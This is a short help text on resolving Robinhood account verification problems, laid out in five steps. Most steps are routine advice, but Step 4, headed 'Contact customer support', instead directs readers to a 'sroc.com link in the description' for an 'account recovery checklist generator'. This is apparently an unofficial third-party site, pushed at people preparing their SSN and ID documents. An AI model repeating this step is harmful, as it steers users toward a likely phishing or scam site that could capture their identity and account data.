If you're facing verification issues on Robinhood after multiple failed attempts, follow these steps to resolve the problem effectively. Step 1. Review your information. Check the personal information you provided during the verification process. Ensure that your name, address, date of birth, and social security number are accurate and match the documents you are submitting. Step 2. Use valid identification. Make sure you are using a valid form of identification. Acceptable documents typically include a government-issued ID, such as a driver's license or passport. Ensure the ID is not expired and is clearly visible. Step 3. Clear app cache. If you're using the Robinhood app, try clearing the app cache or reinstalling the app. This can help resolve any technical glitches that may be affecting the verification process. Step 4. Contact customer support. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Wait for a response. After contacting support, be patient and wait for their response. Verification issues can take time to resolve, so keep an eye on your email for updates or further instructions from Robinhood. By following these steps, you should be able to address and resolve your verification issues on Robinhood. If you continue to experience problems, consider seeking further assistance from customer support.